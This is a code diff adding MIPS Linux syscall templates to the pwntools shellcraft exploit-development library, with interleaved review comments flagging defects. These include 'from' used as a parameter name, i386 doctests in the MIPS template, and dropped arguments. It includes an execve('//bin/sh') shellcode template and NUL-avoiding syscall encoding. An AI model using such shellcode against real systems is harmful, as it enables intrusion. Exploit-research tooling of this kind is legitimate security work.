b/pwnlib/shellcraft/templates/mips/linux/sendfile64.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="out_fd, in_fd, offset, count"/> +<%docstring> +Invokes the syscall sendfile64. See 'man 2 sendfile64' for more information. + +Arguments: + out_fd(int): out_fd + in_fd(int): in_fd + offset(off64_t): offset + count(size_t): count + + + ${syscall('SYS_sendfile64', out_fd, in_fd, offset, count)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setdomainname.asm b/pwnlib/shellcraft/templates/mips/linux/setdomainname.asm new file mode 100644 index 000000000..a73900b39 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setdomainname.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall setdomainname. See 'man 2 setdomainname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_setdomainname', name, len)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setgid.asm b/pwnlib/shellcraft/templates/mips/linux/setgid.asm new file mode 100644 index 000000000..cd5beb7d0 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setgid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="gid"/> +<%docstring> +Invokes the syscall setgid. See 'man 2 setgid' for more information. + +Arguments: + gid(gid_t): gid + + + ${syscall('SYS_setgid', gid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setgroups.asm b/pwnlib/shellcraft/templates/mips/linux/setgroups.asm new file mode 100644 index 000000000..78da7397f --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setgroups.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="n, groups"/> +<%docstring> +Invokes the syscall setgroups. See 'man 2 setgroups' for more information. + +Arguments: + n(size_t): n + groups(gid_t): groups + + + ${syscall('SYS_setgroups', n, groups)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sethostname.asm b/pwnlib/shellcraft/templates/mips/linux/sethostname.asm new file mode 100644 index 000000000..21237bde7 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sethostname.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="name, len"/> +<%docstring> +Invokes the syscall sethostname. See 'man 2 sethostname' for more information. + +Arguments: + name(char): name + len(size_t): len + + + ${syscall('SYS_sethostname', name, len)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/setitimer.asm b/pwnlib/shellcraft/templates/mips/linux/setitimer.asm new file mode 100644 index 000000000..2cc643c48 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setitimer.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="which, new, old"/> +<%docstring> +Invokes the syscall setitimer. See 'man 2 setitimer' for more information. + +Arguments: + which(itimer_which_t): which + new(itimerval): new + old(itimerval): old + + + ${syscall('SYS_setitimer', which, new, old)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setpgid.asm b/pwnlib/shellcraft/templates/mips/linux/setpgid.asm new file mode 100644 index 000000000..4895e4905 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setpgid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pid, pgid"/> +<%docstring> +Invokes the syscall setpgid. See 'man 2 setpgid' for more information. + +Arguments: + pid(pid_t): pid + pgid(pid_t): pgid + + + ${syscall('SYS_setpgid', pid, pgid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setpriority.asm b/pwnlib/shellcraft/templates/mips/linux/setpriority.asm new file mode 100644 index 000000000..fa1b80675 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setpriority.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="which, who, prio"/> +<%docstring> +Invokes the syscall setpriority. See 'man 2 setpriority' for more information. + +Arguments: + which(priority_which_t): which + who(id_t): who + prio(int): prio + + + ${syscall('SYS_setpriority', which, who, prio)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setregid.asm b/pwnlib/shellcraft/templates/mips/linux/setregid.asm new file mode 100644 index 000000000..70628dac9 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setregid.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="rgid, egid"/> +<%docstring> +Invokes the syscall setregid. See 'man 2 setregid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + + + ${syscall('SYS_setregid', rgid, egid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setresgid.asm b/pwnlib/shellcraft/templates/mips/linux/setresgid.asm new file mode 100644 index 000000000..d23f011ab --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setresgid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="rgid, egid, sgid"/> +<%docstring> +Invokes the syscall setresgid. See 'man 2 setresgid' for more information. + +Arguments: + rgid(gid_t): rgid + egid(gid_t): egid + sgid(gid_t): sgid + + + ${syscall('SYS_setresgid', rgid, egid, sgid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setresuid.asm b/pwnlib/shellcraft/templates/mips/linux/setresuid.asm new file mode 100644 index 000000000..e7d6e71c4 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setresuid.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="ruid, euid, suid"/> +<%docstring> +Invokes the syscall setresuid. See 'man 2 setresuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + suid(uid_t): suid + + + ${syscall('SYS_setresuid', ruid, euid, suid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setreuid.asm b/pwnlib/shellcraft/templates/mips/linux/setreuid.asm new file mode 100644 index 000000000..0ea89bda1 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setreuid.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="ruid, euid"/> +<%docstring> +Invokes the syscall setreuid. See 'man 2 setreuid' for more information. + +Arguments: + ruid(uid_t): ruid + euid(uid_t): euid + + + ${syscall('SYS_setreuid', ruid, euid)} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/setrlimit.asm b/pwnlib/shellcraft/templates/mips/linux/setrlimit.asm new file mode 100644 index 000000000..727037e83 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setrlimit.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="resource, rlimits"/> +<%docstring> +Invokes the syscall setrlimit. See 'man 2 setrlimit' for more information. + +Arguments: + resource(rlimit_resource_t): resource + rlimits(rlimit): rlimits + + + ${syscall('SYS_setrlimit', resource, rlimits)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setsid.asm b/pwnlib/shellcraft/templates/mips/linux/setsid.asm new file mode 100644 index 000000000..51067856d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setsid.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall setsid. See 'man 2 setsid' for more information. + +Arguments: + + + + ${syscall('SYS_setsid')} diff --git a/pwnlib/shellcraft/templates/mips/linux/settimeofday.asm b/pwnlib/shellcraft/templates/mips/linux/settimeofday.asm new file mode 100644 index 000000000..49a6c993c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/settimeofday.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="tv, tz"/> +<%docstring> +Invokes the syscall settimeofday. See 'man 2 settimeofday' for more information. + +Arguments: + tv(timeval): tv + tz(timezone): tz + + + ${syscall('SYS_settimeofday', tv, tz)} diff --git a/pwnlib/shellcraft/templates/mips/linux/setuid.asm b/pwnlib/shellcraft/templates/mips/linux/setuid.asm new file mode 100644 index 000000000..642ca579c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/setuid.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="uid"/> +<%docstring> +Invokes the syscall setuid. See 'man 2 setuid' for more information. + +Arguments: + uid(uid_t): uid + + + ${syscall('SYS_setuid', uid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sh.asm b/pwnlib/shellcraft/templates/mips/linux/sh.asm new file mode 100644 index 000000000..21da1293e --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sh.asm @@ -0,0 +1,7 @@ +<% from pwnlib.shellcraft import mips %> +<%docstring>Execute /bin/sh + +${mips.pushstr('//bin/sh')} + +${mips.syscall('SYS_execve', '$sp', 0, 0)} + diff --git a/pwnlib/shellcraft/templates/mips/linux/sigaction.asm b/pwnlib/shellcraft/templates/mips/linux/sigaction.asm new file mode 100644 index 000000000..903dc991c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigaction.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="sig, act, oact"/> +<%docstring> +Invokes the syscall sigaction. See 'man 2 sigaction' for more information. + +Arguments: + sig(int): sig + act(sigaction): act + oact(sigaction): oact + + + ${syscall('SYS_sigaction', sig, act, oact)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sigaltstack.asm b/pwnlib/shellcraft/templates/mips/linux/sigaltstack.asm new file mode 100644 index 000000000..c8f112c1a --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigaltstack.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="ss, oss"/> +<%docstring> +Invokes the syscall sigaltstack. See 'man 2 sigaltstack' for more information. + +Arguments: + ss(sigaltstack): ss + oss(sigaltstack): oss + + + ${syscall('SYS_sigaltstack', ss, oss)} diff --git a/pwnlib/shellcraft/templates/mips/linux/signal.asm b/pwnlib/shellcraft/templates/mips/linux/signal.asm new file mode 100644 index 000000000..4eda4f8db --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/signal.asm 
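Review bot: `${mips.syscall('SYS_execve', '$sp', 0, 0)}` in the new sh.asm hands execve a NULL argv and envp, so the spawned shell starts with argc == 0; the kernel accepts that, but any program that inspects argv[0] (to pick its mode or print its name) behaves differently from a normal invocation, which is a surprise for a template whose docstring only says "Execute /bin/sh". A more conventional form pushes a `{ptr_to_string, 0}` pair after the string and points $a1 at it, and the docstring should state whichever choice is kept, e.g. `Execute /bin/sh with argv and envp both NULL`. The `'//bin/sh'` spelling is presumably chosen to make the path exactly 8 bytes for pushstr — worth a one-line comment so nobody "fixes" it back to `/bin/sh`.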
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="sig, handler"/> +<%docstring> +Invokes the syscall signal. See 'man 2 signal' for more information. + +Arguments: + sig(int): sig + handler(sighandler_t): handler + + + ${syscall('SYS_signal', sig, handler)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sigpending.asm b/pwnlib/shellcraft/templates/mips/linux/sigpending.asm new file mode 100644 index 000000000..205d04326 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigpending.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigpending. See 'man 2 sigpending' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigpending', set)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sigprocmask.asm b/pwnlib/shellcraft/templates/mips/linux/sigprocmask.asm new file mode 100644 index 000000000..fa7462d9c --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigprocmask.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="how, set, oset"/> +<%docstring> +Invokes the syscall sigprocmask. See 'man 2 sigprocmask' for more information. + +Arguments: + how(int): how + set(sigset_t): set + oset(sigset_t): oset + + + ${syscall('SYS_sigprocmask', how, set, oset)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sigreturn.asm b/pwnlib/shellcraft/templates/mips/linux/sigreturn.asm index cf4d7afe5..18f93828d 100644 --- a/pwnlib/shellcraft/templates/mips/linux/sigreturn.asm +++ b/pwnlib/shellcraft/templates/mips/linux/sigreturn.asm @@ -1,5 +1,9 @@ + <% -from pwnlib.shellcraft.mips.linux import syscall + from pwnlib.shellcraft.mips.linux import syscall %> -<%docstring>Sigreturn system call - ${syscall('SYS_sigreturn', )} +<%docstring> +Invokes the syscall sigreturn. See 'man 2 sigreturn' for more information. + + + ${syscall('SYS_sigreturn')} 
diff --git a/pwnlib/shellcraft/templates/mips/linux/sigsuspend.asm b/pwnlib/shellcraft/templates/mips/linux/sigsuspend.asm new file mode 100644 index 000000000..774384fca --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sigsuspend.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="set"/> +<%docstring> +Invokes the syscall sigsuspend. See 'man 2 sigsuspend' for more information. + +Arguments: + set(sigset_t): set + + + ${syscall('SYS_sigsuspend', set)} diff --git a/pwnlib/shellcraft/templates/mips/linux/splice.asm b/pwnlib/shellcraft/templates/mips/linux/splice.asm new file mode 100644 index 000000000..5762be0a9 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/splice.asm @@ -0,0 +1,18 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fdin, offin, fdout, offout, len, flags"/> +<%docstring> +Invokes the syscall splice. See 'man 2 splice' for more information. + +Arguments: + fdin(int): fdin + offin(off64_t): offin + fdout(int): fdout + offout(off64_t): offout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_splice', fdin, offin, fdout, offout, len, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/stat.asm b/pwnlib/shellcraft/templates/mips/linux/stat.asm new file mode 100644 index 000000000..398f20cf5 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/stat.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat. See 'man 2 stat' for more information. + +Arguments: + file(char): file + buf(stat): buf + + + ${syscall('SYS_stat', file, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/stat64.asm b/pwnlib/shellcraft/templates/mips/linux/stat64.asm new file mode 100644 index 000000000..b097104d2 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/stat64.asm 
@@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="file, buf"/> +<%docstring> +Invokes the syscall stat64. See 'man 2 stat64' for more information. + +Arguments: + file(char): file + buf(stat64): buf + + + ${syscall('SYS_stat64', file, buf)} diff --git a/pwnlib/shellcraft/templates/mips/linux/stime.asm b/pwnlib/shellcraft/templates/mips/linux/stime.asm new file mode 100644 index 000000000..c2d59af97 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/stime.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="when"/> +<%docstring> +Invokes the syscall stime. See 'man 2 stime' for more information. + +Arguments: + when(time_t): when + + + ${syscall('SYS_stime', when)} diff --git a/pwnlib/shellcraft/templates/mips/linux/stty.asm b/pwnlib/shellcraft/templates/mips/linux/stty.asm new file mode 100644 index 000000000..07ae6de55 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/stty.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, params"/> +<%docstring> +Invokes the syscall stty. See 'man 2 stty' for more information. + +Arguments: + fd(int): fd + params(sgttyb): params + + + ${syscall('SYS_stty', fd, params)} diff --git a/pwnlib/shellcraft/templates/mips/linux/symlink.asm b/pwnlib/shellcraft/templates/mips/linux/symlink.asm new file mode 100644 index 000000000..b3308b823 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/symlink.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="from, to"/> +<%docstring> +Invokes the syscall symlink. See 'man 2 symlink' for more information. + +Arguments: + from(char): from + to(char): to + + + ${syscall('SYS_symlink', from, to)} diff --git a/pwnlib/shellcraft/templates/mips/linux/symlinkat.asm b/pwnlib/shellcraft/templates/mips/linux/symlinkat.asm new file mode 100644 index 000000000..23871a731 --- /dev/null 
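Review bot: `<%page args="from, to"/>` in the new symlink.asm uses the Python keyword `from` as a parameter name; Mako compiles page args into a Python `def`, so the template raises a SyntaxError the first time `shellcraft.mips.linux.symlink` is rendered, and `${syscall('SYS_symlink', from, to)}` is equally invalid as an expression. Rename it, e.g. `<%page args="from_, to"/>` and `${syscall('SYS_symlink', from_, to)}`, and update the `from(char): from` docstring line to match. Since these templates look generated from C prototypes, the generator should map keyword-named parameters to a safe spelling so every architecture gets the same fix.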
+++ b/pwnlib/shellcraft/templates/mips/linux/symlinkat.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="from, tofd, to"/> +<%docstring> +Invokes the syscall symlinkat. See 'man 2 symlinkat' for more information. + +Arguments: + from(char): from + tofd(int): tofd + to(char): to + + + ${syscall('SYS_symlinkat', from, tofd, to)} diff --git a/pwnlib/shellcraft/templates/mips/linux/sync.asm b/pwnlib/shellcraft/templates/mips/linux/sync.asm new file mode 100644 index 000000000..5f2df67b8 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sync.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args=""/> +<%docstring> +Invokes the syscall sync. See 'man 2 sync' for more information. + +Arguments: + + + + ${syscall('SYS_sync')} diff --git a/pwnlib/shellcraft/templates/mips/linux/sync_file_range.asm b/pwnlib/shellcraft/templates/mips/linux/sync_file_range.asm new file mode 100644 index 000000000..d60bdbe5d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/sync_file_range.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fd, offset, count, flags"/> +<%docstring> +Invokes the syscall sync_file_range. See 'man 2 sync_file_range' for more information. + +Arguments: + fd(int): fd + offset(off64_t): offset + count(off64_t): count + flags(unsigned): flags + + + ${syscall('SYS_sync_file_range', fd, offset, count, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/syscall.asm b/pwnlib/shellcraft/templates/mips/linux/syscall.asm index 6ea99eff5..31cef1d1a 100644 --- a/pwnlib/shellcraft/templates/mips/linux/syscall.asm +++ b/pwnlib/shellcraft/templates/mips/linux/syscall.asm 
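Review bot: `<%page args="from, tofd, to"/>` in the new symlinkat.asm uses the Python keyword `from` as a parameter name, so Mako's generated `def render_body(context, from, tofd, to, ...)` is a SyntaxError and the template fails at first use; `${syscall('SYS_symlinkat', from, tofd, to)}` is invalid for the same reason. Change to `<%page args="from_, tofd, to"/>` and `${syscall('SYS_symlinkat', from_, tofd, to)}`, and rename the `from(char): from` docstring entry accordingly.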
@@ -1,10 +1,9 @@
 <%
-    from pwnlib.shellcraft import mips
-    from pwnlib.context import context as ctx # Ugly hack, mako will not let it be called context
+    from pwnlib.shellcraft import mips, pretty
+    from pwnlib.constants import Constant
+    from pwnlib.abi import linux_mips_syscall as abi
 %>
-
-
-<%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4 = None, arg5 = None, arg6 = None"/>
+<%page args="syscall = None, arg0 = None, arg1 = None, arg2 = None, arg3 = None, arg4=None, arg5=None"/>
 <%docstring>
 Args: [syscall_number, \*args]
 Does a syscall
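Review bot: The new `<%page args=...>` line drops `arg6`, so any caller that passed seven positional arguments now gets a TypeError from Mako instead of having the value placed; if that is intended because the o32 convention carries at most the arguments the new abi object lists, say so in the docstring (`Supports up to six syscall arguments`) rather than leaving it implicit. The defaults `arg4=None, arg5=None` are also spaced differently from `arg3 = None`; keep one form across the signature. The docstring this hunk opens continues past the hunk.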
@@ -13,29 +12,68 @@ Any of the arguments can be expressions to be evaluated by :func:`pwnlib.constan Example: - >>> print shellcraft.mips.linux.syscall(11, 1, 'sp', 2, 0).rstrip() - /* call syscall(11, 1, 'sp', 2, 0) */ - /* Set a0 = 1 = 0x1 */ - li $a0, 1 - move $a1, $sp - /* Set a2 = 2 = 0x2 */ - li $a2, #2 - /* Set a3 = 0 = 0x0 */ - xor $a3, $a3, $a3 - /* Set a7 = 11 = 0xb */ - li $v0, 11 - syscall - >>> print shellcraft.mips.linux.syscall('SYS_exit', 0).rstrip() - /* call exit(0) */ - /* Set a0 = 0 = 0x0 */ - xor $a0, $a0, $a0 - /* Set v0 = (SYS_exit) = 0xfa1 */ - move $v0, (SYS_exit) - syscall + >>> print pwnlib.shellcraft.i386.linux.syscall('SYS_execve', 1, 'esp', 2, 0).rstrip() + /* call execve(1, 'esp', 2, 0) */ + push 0x1 + pop ebx + mov ecx, esp + push 0x2 + pop edx + xor esi, esi + push 0xb + pop eax + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall('SYS_execve', 2, 1, 0, 20).rstrip() + /* call execve(2, 1, 0, 20) */ + push 0x2 + pop ebx + push 0x1 + pop ecx + push 0x14 + pop esi + push 0xb + pop eax + cdq /* Set edx to 0, eax is known to be positive */ + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall().rstrip() + /* call syscall() */ + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall('eax', 'ebx', 'ecx').rstrip() + /* call syscall('eax', 'ebx', 'ecx') */ + /* moving ebx into ebx, but this is a no-op */ + /* moving ecx into ecx, but this is a no-op */ + /* moving eax into eax, but this is a no-op */ + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall('ebp', None, None, 1).rstrip() + /* call syscall('ebp', ?, ?, 1) */ + push 0x1 + pop edx + mov eax, ebp + int 0x80 + >>> print pwnlib.shellcraft.i386.linux.syscall( + ... 'SYS_mmap2', 0, 0x1000, + ... 'PROT_READ | PROT_WRITE | PROT_EXEC', + ... 'MAP_PRIVATE | MAP_ANONYMOUS', + ... 
-1, 0).rstrip() + /* call mmap2(0, 4096, 'PROT_READ | PROT_WRITE | PROT_EXEC', 'MAP_PRIVATE | MAP_ANONYMOUS', -1, 0) */ + xor ebx, ebx + xor ecx, ecx + mov ch, 0x10 + push 0x7 + pop edx + push 0x22 + pop esi + push -1 + pop edi + xor ebp, ebp + xor eax, eax + mov al, 0xc0 + int 0x80 <% - if isinstance(syscall, (str, unicode)) and syscall.startswith('SYS_'): - syscall_repr = syscall[4:] + "(%s)" + append_cdq = False + if isinstance(syscall, (str, unicode, Constant)) and str(syscall).startswith('SYS_'): + syscall_repr = str(syscall)[4:] + "(%s)" args = [] else: syscall_repr = 'syscall(%s)' @@ -48,15 +86,17 @@ Example: if arg == None: args.append('?') else: - args.append(repr(arg)) + args.append(pretty(arg, False)) while args and args[-1] == '?': args.pop() syscall_repr = syscall_repr % ', '.join(args) + + registers = abi.register_arguments + arguments = [syscall, arg0, arg1, arg2, arg3, arg4, arg5] + regctx = dict(zip(registers, arguments)) %>\ /* call ${syscall_repr} */ -% for dst, src in zip(['a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'v0'], [arg0, arg1, arg2, arg3, arg4, arg5, arg6, syscall]): - % if src != None: - ${mips.mov(dst, src)} - % endif -% endfor - syscall +%if any(a is not None for a in arguments): + ${mips.setregs(regctx)} +%endif + syscall 0x40404 diff --git a/pwnlib/shellcraft/templates/mips/linux/syslog.asm b/pwnlib/shellcraft/templates/mips/linux/syslog.asm new file mode 100644 index 000000000..f8dbf7c99 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/syslog.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="pri, fmt, vararg"/> +<%docstring> +Invokes the syscall syslog. See 'man 2 syslog' for more information. + +Arguments: + pri(int): pri + fmt(char): fmt + vararg(int): vararg + + + ${syscall('SYS_syslog', pri, fmt, vararg)} diff --git a/pwnlib/shellcraft/templates/mips/linux/tee.asm b/pwnlib/shellcraft/templates/mips/linux/tee.asm new file mode 100644 index 000000000..72ce74b9b --- /dev/null 
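Review bot: `regctx = dict(zip(registers, arguments))` silently discards trailing arguments whenever `abi.register_arguments` is shorter than the seven-element `arguments` list; on o32 MIPS only $a0–$a3 carry syscall arguments and the fifth and sixth go on the stack at 16($sp) and 20($sp), so if the abi lists only register slots a six-argument call such as mmap is emitted with its last arguments missing and no error. Either check `len(registers) >= len(arguments)` and raise, or place the stack-passed arguments explicitly, and document the supported count. The doctest examples added here are the i386 ones (`pwnlib.shellcraft.i386.linux.syscall`, `int 0x80`), so the MIPS template now documents another architecture and never exercises `mips.setregs`; replace them with examples that call `shellcraft.mips.linux.syscall` and show MIPS output. `append_cdq = False` is never read in this template and looks like a leftover from the i386 copy. `syscall 0x40404` replaces a plain `syscall` with no explanation — presumably the code field is there to keep the instruction encoding free of NUL bytes, so add `/* the 0x40404 code keeps the syscall encoding NUL-free */` if that is the reason; the docstring this hunk edits opens before the hunk.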
+++ b/pwnlib/shellcraft/templates/mips/linux/tee.asm @@ -0,0 +1,16 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="fdin, fdout, len, flags"/> +<%docstring> +Invokes the syscall tee. See 'man 2 tee' for more information. + +Arguments: + fdin(int): fdin + fdout(int): fdout + len(size_t): len + flags(unsigned): flags + + + ${syscall('SYS_tee', fdin, fdout, len, flags)} diff --git a/pwnlib/shellcraft/templates/mips/linux/time.asm b/pwnlib/shellcraft/templates/mips/linux/time.asm new file mode 100644 index 000000000..4a26e4032 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/time.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timer"/> +<%docstring> +Invokes the syscall time. See 'man 2 time' for more information. + +Arguments: + timer(time_t): timer + + + ${syscall('SYS_time', timer)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_create.asm b/pwnlib/shellcraft/templates/mips/linux/timer_create.asm new file mode 100644 index 000000000..c8c271128 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_create.asm @@ -0,0 +1,15 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="clock_id, evp, timerid"/> +<%docstring> +Invokes the syscall timer_create. See 'man 2 timer_create' for more information. + +Arguments: + clock_id(clockid_t): clock_id + evp(sigevent): evp + timerid(timer_t): timerid + + + ${syscall('SYS_timer_create', clock_id, evp, timerid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_delete.asm b/pwnlib/shellcraft/templates/mips/linux/timer_delete.asm new file mode 100644 index 000000000..73ca81b96 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_delete.asm 
@@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_delete. See 'man 2 timer_delete' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_delete', timerid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_getoverrun.asm b/pwnlib/shellcraft/templates/mips/linux/timer_getoverrun.asm new file mode 100644 index 000000000..8920a6603 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_getoverrun.asm @@ -0,0 +1,13 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timerid"/> +<%docstring> +Invokes the syscall timer_getoverrun. See 'man 2 timer_getoverrun' for more information. + +Arguments: + timerid(timer_t): timerid + + + ${syscall('SYS_timer_getoverrun', timerid)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_gettime.asm b/pwnlib/shellcraft/templates/mips/linux/timer_gettime.asm new file mode 100644 index 000000000..b6475f3e6 --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_gettime.asm @@ -0,0 +1,14 @@ + +<% + from pwnlib.shellcraft.mips.linux import syscall +%> +<%page args="timerid, value"/> +<%docstring> +Invokes the syscall timer_gettime. See 'man 2 timer_gettime' for more information. + +Arguments: + timerid(timer_t): timerid + value(itimerspec): value + + + ${syscall('SYS_timer_gettime', timerid, value)} diff --git a/pwnlib/shellcraft/templates/mips/linux/timer_settime.asm b/pwnlib/shellcraft/templates/mips/linux/timer_settime.asm new file mode 100644 index 000000000..bdc6cf39d --- /dev/null +++ b/pwnlib/shellcraft/templates/mips/linux/timer_settime.asm 
